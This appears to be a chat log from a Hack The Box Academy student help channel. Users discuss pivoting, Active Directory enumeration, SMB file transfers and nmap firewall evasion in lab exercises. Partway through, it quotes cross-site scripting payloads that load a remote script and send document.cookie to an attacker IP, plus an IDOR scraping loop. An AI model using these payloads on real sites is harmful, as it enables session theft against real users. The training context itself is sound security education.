no its just like lag or something? it comes and goes, keep retrying

hmm, usually for me its just rdp no issues SCP or ssh or whatever, have you reset?

target and pwnbox

Have you tried using remmina?

I never had any issues there are also some flags in xfreerdp you can apply to help you if you scroll up they are in here somewhere or use the man page

I’m pretty sure there’s a /auto-reconnect flag you can put on and there is one for timeouts too but I don’t know them off the top of my head I just tend to use remmina but it’s a gui but as long as it’s done I don’t care 😂

I don't know the situation with the box you were on, but sudoers entries match on the start of a string and that can be a reason. Other times if you're exploiting something, the account that runs the binary may not have the environmental variables you expect (i.e. PATH). Maybe other reasons too, but at any rate full paths are usually something you should try.

usually entries in sudoers will have the absolute path to the file. if it's a relative path, that's an issue

Which vm software should I use?

While I managed to pass the skill assessment lab for the Pivoting, Tunneling, and Port Forwarding module i have a question (SPOILER AHEAD)
||While doing dynamic port forwarding using ssh -D 9050 or using the solution provided (metasploit) my nmap (same as in the solution) ends up showing this:
proxychains nmap 172.16.5.35 -Pn -sT 53/tcp open domain syn-ack 113/tcp closed ident conn-refused 2000/tcp open cisco-sccp syn-ack 5060/tcp open sip syn-ack

However in the solution I am meant to have something similar to this:
proxychains nmap 172.16.5.35 -Pn -sT 22/tcp open ssh 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server

Any idea why that might happen?||

Week 6 > Attacking Common Services > Attacking Email Services

I am on the last question and where I have to login to the targets email. Everytime I try to use telnet to login I keep getting strings saying invalid commands. Since my screenshots will have answers to the other question in them I will have to send them via DM if you need them

I seem to recall unusual results like that. A little googling and I found someone posted about the issue. I also found someone pointing out that NMAP has it's own arguments to specify a SOCKS proxy which works better than proxychains.
https://stackoverflow.com/questions/78202269/nmap-scan-returns-all-ports-open-when-ran-with-proxychains-through-a-linux-w
||I should go back and play with it some more myself because when I found that nmap over proxychains was prohibitively slow and gave me weird results I just opted for another route. Sshuttle worked way better for me in that first pivot. I must have gone through that assessment 4 times already with different tools including ligolo... and still feel like I could learn more||

What service

I've only tried using telnet to login from the IMAP and POP servers and both keep giving me invalid credential errors even though I am using the correct password and username

Did you add the domain to the username

the "@domain.htb"? yes I did

Dm the commands

https://academy.hackthebox.com/achievement/1267476/9

Is there something I can add to my routers whitelist so I can not send the docker sites through my proxy tunnel? As they are not working with the proxy tunnel enabled.

Without having to add every ip individually

@shut vapor Thank you for sharing this! Even with sshuttle I had similar issues but I guess I should try again :).Aside from that, you are right, indeed it might be worth digging into nmap args as well.

I'm on Active Directory Enumeration & Attacks > ACL Enumeration
Trying to follow along and reverse an ObjectACEType GUID to human-readable form
The "reverse search and mapping" powershell command throws an error I'm not having luck fumbling my way around:

PS C:\> Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl

An error occurred while enumerating through a collection: The (&ObjectClass -like
'ControlAccessRight') search filter is invalid..
At C:\Tools\PowerView.ps1:6664 char:13
+             $Results | Where-Object {$_} | ForEach-Object {
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (System.Director...sultsEnumerator:ResultsEnumera
   tor) [], RuntimeException
    + FullyQualifiedErrorId : BadEnumeration

don't use the -like operator use -eq instead

it says in your error you pasted the search filter -like is invalid

anyone else cant start machine in CTPS Academy

You're partially right. It doesn't like -eq either. Something is wrong with referencing "ObjectClass" I think. I completely remove the filter and I get the output that is expected. I found the issue in errata and am very interested in learning how @.dpgg got it working.
#1244914227018203207 message

This might sound like a weird question but is it possible to print a whole module in one go not page by page?

Or like get a pdf for a module

I cant bare to look at my screen rn

I had assumed you assigned $guid already

I did.

it definitely would complain about something else if $guid wasn't assigned. Something wonky with that command for me.

i'd have to see the new error after using -eq

Same error essentially. Completely remove that -filter bit and it works. ¯_(ツ)_/¯

it's a different error

I put the details in erratum linked earlier too

it says the ControlAccessRight search filter is invalid

try correcting the case as AD searches can be case-sensitive

controlAccessRight

you may also want to simplify it and try running just a basic query to see if basic retrieval is working

Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -eq 'controlAccessRight'} -Properties Name,DisplayName,DistinguishedName,rightsGuid

It most certainly is the same error with the exception that one mentions -like and the other -eq:

Uh... let me try with "controlAccessRight" but it's neither here nor there at this point. I don't think that filter is necessary.

No luck fixing case or using the command you offered. Thanks for your insights though. My notes are in errata and maybe @.dpgg can offer some clarity.

welp no idea then. i'm not a programmer by any means.

lol yea I gotchya. I'm mystified by powershell myself.

and I am a programmer

that command works for me

wth 💀

he's a real programmer

ControlAccessRight should be a valid filter, idk why it's saying invalid

that's a different command

after -Filter Xre0us has {ObjectClass... while the original command has -Filter {$_.ObjectCLass...

i believe $_. iterates like "for each"

or something like that

ack! You're right. The $_ was from me futzing with it and using the up arrow to grab it out of history.

Here without the $_ though... and then with the filter removed it works.

well glad you guys got it figured out

Anywya... yea. If it's working for XreOuS I'll... uh... I don't know... try again tomorrow with a fresh lab.

And if not I'll just stick with my abridged version

GOYS! @cloud urchin @next bronze (sorry to @ you XreOuS, I see you're DND but wanted to show you)

It fails after importing PowerView!

THATS the problem. 😅 🤪 💀

oh I've heard this from someone else

yeah that's a thing, if you import powerview some objects are modified

makes sense

It even says in the error but I was thinking the command from the lab involved PowerView (because it does earlier).

Well... that's one of those things that wasted a ton of my time that I'll never forget at least.

Thanks for all the help!

I believe powerview has built in queries for this so I guess once you import it you can just use those

i knew it the whole time, i just wanted you to figure it out for yourself

hi, ```#!/bin/bash

url="http://ip:port"

for i in {1..20}; do
for link in $(curl -s "$url/documents.php" -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'uid=$i' | grep -oP "/documents.*?.txt"); do
wget -q $url/$link
done
done```

something wrong?

lol .

@cloud urchin

?

are you serious

why did you randomly ping me

In order not to give a direct clue to the answer, I will only say that the solution to this question is to read the clue that the question gives you (press hint).

is not randomly lol i was needing help with a module

seemed pretty random. you didn't mention the module/section, or anything for that matter

am i supposed to read your mind?

So funny every time tomrider types 🤣

i can't figure out what you're trying to do either

why?

idk if that's really tomrider

if you search his name there are two accounts, same name same pic different discord name

why are you searching my name just stop here

were you banned or something

i can confirm that this is tomrider

no

Try replacing wget -q with curl -O

i already solve it

He gets angry because I asked him something, then he started looking for my name and accusing me of being previously banned, what a clown

i'm angry?

you're either rude as hell or new to the internet

the real tomrider wouldn't talk to me like that

or both

there are 2?

more than 20 years in the industry and you tell me this, could you please have some respect?

yeah search the name there are 2 accounts.

time to ban one of them

and you can't figure out a simple bash script?

stop making tom look bad

are both of them trolls?

hey does anybody know why i cant type in general

you need to verify your account by following the steps in #welcome

Then ask for the ban, jackass, the best thing he can do is make fun of me because I asked for help with a bash script (the script was fine, there was something in the module that I had understood) if you want to call me stupid, I don't think this is the correct context, I don't think you have the authority with that role to make fun of someone who pays the Academy premium for a question in a module.

you didn't ask for help though you just pasted a script with no context

yes lol i was expecting some obviously bash error that i yet no figured but wasnt that, my bad for the lack of context

there's no need for the namecalling

i'm not great at scripting so idk if there's anything wrong with that

i threw it into chatgpt and it said nothing about anything being wrong

just provide more context with your question next time and you'll have a better chance at getting help

Ok, sorry for being rude supernuts and calculacOre

okay buddy with 20 years of experience

@dim wolf Are you sure there was no need for namecalling?

you still didnt' say what you needed help with

This dude has mastered trolling

30 mins later...

ngl it's pretty entertaining

Check my recent messages, I already solved it, thanks anyway

im not trolling can you stop?

ooh I get it

20 years of experience with trolling

very good, sir

what did you do with the real tomrider36

if you want to continue your general antics move to #general

no you're gonna steal my account

just dont accuse me of serious things without foundation.

Hi

Oh

Hello! What method can I use to transfer/download files from Windows rdp session to Linux attack box if SCP is not working? I am currently stuck on Pilaging Section of Windows Privilege Escalation Module and any help is appreciated!

smb, http, rdp itself can do it by sharing drives

plenty of ways

ftp

Tried smb but didnt work either. Ok let me try ftp. Thanks man

are you using xfreerdp

Yup

try adding the drive parameter, /drive:/home/user/desktop

then you can access the shared folder in file explorer

Hmm I can access them on windows when I use xfreerep but I am trying to download those files to linux machine so I can use secretadump.py and get the hash

it shares the folder you select, you can transfer back and forth through that folder..

Anyone for intro to whitebox pentesting skills assessment question 2? Keep getting code injection should not be possible, even without sanitization or validation. Not seeing what’s triggering a code injection vuln

anybody else have or had trouble with installing the instant client for oracle and setting up odat in kali linux either arm64 architecture or amd/intel cpus ? (module : foot printing - Oracle TNS)

Module: Using Crackmapexec -> Spidering and Finding Juicy Information in an SMB Share

Anyone run into this issue when trying to use the spider module in netexec?

ERROR NetBIOSTimeout on target 10.129.204.177: The NETBIOS connection with the remote host timed out. connection.py:172

Module: MSSQL, Exchange, and SCCM Attacks
Section: Skills Assessment
Can someone confirm that we can authenticate on any of the MSSQL database (DB01 or DB02)? I tried a lot of differents credentials and I can't connect to to neither of them

haven't open this module

https://tenor.com/6BO9.gif

Currently doing SQLMap Essentials - Skills Assessment.

Not really looking for hints but I cannot seem to find the place where I need to inject.

Did you guys find it manually or with SQLMap?

what ports are open there?

I'm afraid it has nothing to do with which ports are open

hmm intresting

you already have port given by assessment

is there anything related to login or parameter in the request?

No

can you share the screenshot or its web view?

Module: MSSQL, Exchange, and SCCM Attacks
Section: Skills Assessment
Can someone confirm that we can authenticate on any of the MSSQL database (DB01 or DB02)? I tried a lot of differents credentials and I can't connect to to neither of them

Password Attacks > Credential Hunting in Windows

What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)

i got Winscp passwords from Lazagne.exe but when i submit the answer with right Format it didnt work any idea ?

make sure no spaces are in ur answer

if there arent spaces, DM me if u want, to avoid spoilers here

i tried... and also i write the creds to make sure there is no space

k DM

try looking for a POST request

''><script src=http://IP:8080/script.js></script>

Only POST request I can get a hold of are there and I don't think they will do much

try restarting it

looks fine

same issue unfortunately

i think u need to have a ;

at the end of the line in script.js file

I modified it slightly and still same issue

weird

Hello, folks. I was hoping I could please get some help with INTRO TO ASSEMBLY LANGUAGE. I am stuck on Procedures.
Try assembling and debugging the above code, and note how "call" and "ret" store and retrieve "rip" on the stack. What is the address at the top of the stack after entering "Exit"? (6-digit hex 0xaddress, without zeroes)
I have tried an objdump, disas, and breaks. I am not really sure what the question is asking. When I did the break from _start and stepped through everything, I tried every hex there just to try and pass this; no matter what I tried I cannot seem to pass

i got it to work with just the new image script

try that

just tried, no luck. I think the cookie just isn't being set on the victim machine

like this? "><script>new Image().src='http://ip/index.php?c='+document.cookie;</script>

yes same issue, I get my own cookie just not the victim cookie

this is the last parameter right?

yes I literally copied your payload and even tried removing index.php so it only showed the cookie

yeah, im not sure tbh

last thing I got is to switch vpns

I'm using the attackbox 😭

ik, i meant the server

Hi everybody I want to register as a student, but I can't

reach to support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Hey guys, I cleaned every questions from the Skills Assessment - WordPress exam but the question regarding the unauthenticated file download flag, I used wpscan with my api-key but no matter which vuln am looking at I :
A - Struggle I trying to use them all as most of them don't have an online PoC or a (working) module in metasploit
B - Don't find which one is supposed to be the one to exploit as the descriptions aren't really helping me

anyone could give me a head up please ?

update : Found it

Hey in the citrix breakout section of windows priv esc module how to get the administrators flag i cant seem to access any smb shares to get the tools to strts a cmd shell

I need help with Password attacks module. Anyone who's done it?

just say what u need help with

what SMB share?

Accessing smb share from restricted enviornment that part you have to do right

To access the tools from the htb student

That part i dont understand

they talked about it in the module, how access to certain folders, in the example that was show, access to C:\users was foribidde, so a bypass for that is to host an SMB share yourself (using impacket) and then accessing stuff from it

Where in the pwn box itself host a share

use smbserver.py as the module explained

Error. Machine is not starting in Nmap firewall bypass easy lab module

still happening?

Yup. Just loading "Target is spawning"

start a target in another module and try again

here im learning Remote code execution using SMB..Under that SMBExec which is fine which uses smb for rce but why im learning PsExec and atexec ?

different methods of command execution

Guys can I ask if we can save files on Pwnbox?

i dont think you can, each time u restart the instance, everything get reset

I think there's a small persistent storage but I don't use it enough to know where it is

maybe the desktop?

I'll try.. thanks

Hi there, is here anyone who can help with module Intro to Assembly Language, section Procedures.
Question asking - Try assembling and debugging the above code, and note how "call" and "ret" store and retrieve "rip" on the stack. What is the address at the top of the stack after entering "Exit"? (6-digit hex 0xaddress, without zeroes).

I have tried every possible hex value, but no way. ```python
global _start

section .data
message db "Fibonacci Sequence:", 0x0a

section .text
_start:
call printMessage ; print intro message
call initFib ; set initial Fib values
call loopFib ; calculate Fib numbers
call Exit ; Exit the program

printMessage:
mov rax, 1 ; rax: syscall number 1
mov rdi, 1 ; rdi: fd 1 for stdout
mov rsi,message ; rsi: pointer to message
mov rdx, 20 ; rdx: print length of 20 bytes
syscall ; call write syscall to the intro message
ret

initFib:
xor rax, rax ; initialize rax to 0
xor rbx, rbx ; initialize rbx to 0
inc rbx ; increment rbx to 1
ret

loopFib:
add rax, rbx ; get the next number
xchg rax, rbx ; swap values
cmp rbx, 10 ; do rbx - 10
js loopFib ; jump if result is <0
ret

Exit:
mov rax, 60
mov rdi, 0
syscall

gdb would show you the address at the top of the stack, it's below the registers. step through the program and stop at the right place, then look for the address

I'll try. I contact you on progress. Thanks 🙂

Module: MSSQL, Exchange, and SCCM Attacks
Section: Skills Assessment
Can someone confirm that we can authenticate on any of the MSSQL database (DB01 or DB02)? I tried a lot of differents credentials and I can't connect to to neither of them

Hey im doing windows priv esc module the citrix breakout section in there they have a section where we need to share tools using an smb share

I dont understand they say we need to start a smb share from attack box but there is not tools folder in the pwn box to set up a share

Did you read a module called “SMB”?

If not, then you’re too ahead of yourself lol

which smbclient i think theres better tools for that though @limpid hemlock

impacket? py-smb (or whatever its called)? someone here would know better.

Yeah, I did that module and he just needs to go back to his notes, giving him hints isn’t worth it

Sometimes you need to go back to another module to understand it

For sure

Anyone knws how to solve it

three separate people have replied to you telling you to read the module again

^ this too

somewhere stuck in Easy lab of OS finding.

Tried -sS, -O, aggressive scan, -T2, -T4, Decoys, -f, RND:10, Specific ports...........Nothing work

but didn't suucced yet. Any guess please

Try to use —source-port= 53

Go back to the Bypassing Firewalls module

Port 53 is not availabel

Then you need to find the whitelisted port

This module teaches this issue

I go through this but I'm trying my best.....Now

You just want the OS?

Yup.....there are active firewall and IDS/IPS

Try “nmap <targetip> -sV -sC -O -Pn —disable-arp-ping”

Yep I know 🙂

That lab was tough. But go back to every note

But if you also do —packet-trace you can see what ports have success what doesn’t when using source ports

The part i have a doubt is the tools are in the first box i rdp into right then from there we visst a site and then get a citrix launch ica file in order to connect to the restricted environment

So once we are in the restricted environment we need to tranfer our toold from the machin we rdp'd into initialy which has the toold right

These guys have not properly explained how to start a smb server from that initial box we rdp'd into so that we can access that share to get the tools from there

what?

it's literally in the screenshot you sent

impacket's smbserver

Ya but where to start that smb server

Thats where im confused

the terminal?

No from where like if i start it from my pwn box i dont have the tools in my pwn box to share right the tools are in the machine u rdp into initialy

So to share those tools u need to start a share from that machine we rdp into initilay right but

Being at the Windows Privilege Escalation in the path would mean that you have somewhat of a knowledge about the environment and networking

Take a break and a step back, and I'm pretty sure you will be able to answer the question about where to start the smbserver on your own

Actualy i got it

😅😂 something just hit me now

I asked this module out of scope question in web yesterday, but i think its fairly pedestrian and didnt get an answer, if anyone is willing to answer a simple Q regarding what i think is param pollution (just a yes/no) i would appreciate it. #web message

do you know how to use the which cmd? i already suggested you use that to find the tool you're looking for... man man and man which

╰─ which man                                                                 ─╯
/usr/bin/man

╭─ ~ ······················································ 1 ✘  07:44:58 ─╮
╰─ apropos -e awk                                                            ─╯
awk (1)              - pattern scanning and text processing language

@limpid hemlock you should take note of these 3 cmds, man , apropos, which, they help out considerably

one cant be expected to remember every little thing, linux helps us out a fair bit with that

No the part where im strugling is that i need to start a smb share and in the module they simply started one

I try to start one and it fails

Is there any creds to use to be root so i can try to start one as root

i highly suggest you buy the fundamentals module... i dont see you specificying a password for your cmd substition $(pwd) these basics are covered pretty exhaustively in the fundamentals course

failing that you may want to run your cmds by chatgpt and have it explain them to you

I tried to su root but didnt have any creds i tried some creds like root and all below

try sudo -i

But that didnt wrk thats why i asked if in this section any creds given to be root cause i dont see one here

That worked bro thanks

Yeah, unless you've been daily-driving Linux as a primary OS since 2008 as I have, the Linux Fundamentals module is an absolute must if you want to get anywhere here.

Read file transfer module , windows file transfer section
what they are doing here is that they start an smbserver to the public, and after that from the windows victim they mount that share and upload/download files from it

$(pwd) is for current directory, which could have been just a .

oh gosh, yes thats right. sorry im just barely waking up

and waking up too early as it is doesnt help either

this
also, try to map the environment in a paper or Draw.io or something. It is really important specially when you get into the AD and pivoting voodoo magic

Password Attacks > Credential Hunting in Linux

• 0 Examine the target and find out the password of the user Will. Then, submit the password as the answer.

i have kira ssh and i got so stuck i know there is passwd and shadow bak but what next, any idea ?

in order to run a server you typically need to assign a port on your machine(think of it like you are running a cupcake shop from your house and you use the windows as a selling point to customers, that winodow is a port). As for smb servers they are usually assigned to port 465, and Linux by default only allows ports up to 1023 to be assigned by root

so tldr; use sudo

crack the has from shadow with hashcat? havent done this module but that seems most logical

i dont have prem to see shadow

sudo -l ?

also

any perms listed in sudoers?

no

bash version vulnerable?

the section did not focus for this

its about hunting

this is more like box strat, sorry i can be of more help

there are two tools and non of them work

so y ou just know the files exist, you cant actually verify with ls right?

or you can ls /etc/ but cant cat?

i can see them with ls

nvm i got it

hello, i'm in the last step of the footprinting medium lab, i just need to find the password in the msql server but i dont understand how i can get the information out of the DB

run some queries or use the gui tool

Module: Windows Privilege Escalation